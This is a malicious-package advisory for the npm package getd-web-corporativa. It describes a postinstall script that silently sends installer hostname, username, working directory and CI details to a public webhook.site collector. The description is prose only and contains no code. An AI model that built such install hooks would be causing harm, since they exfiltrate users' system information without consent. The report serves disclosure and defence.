getd-web-corporativa @0.0.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5472
Ecosystem
npm
Summary
On npm install , postinstall.js performs an HTTPS GET to a hardcoded webhook.site receiver, leaking the installer's hostname, OS username, platform, current working directory, package name/version, CI/build indicators, and a timestamp via URL query parameters. Errors are swallowed so installation appears to succeed silently. The destination is a public webhook collector — any party holding the UUID path can read every submission, so this is unauthenticated host reconnaissance suitable for follow-on targeting. The package's name resembles the @getd/* scope but is published unscoped by jplopezy (defensive-squat) with no repository and a placeholder homepage; the README's 'defensive squat telemetry' framing does not change the fact that installer-side identity data is shipped off-host without consent on every install. The package has no other functionality.
Source: amazon-inspector (6751d3ca04c2ae596f7e809e339770edaed576060d361c061311960b0a3a7033)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.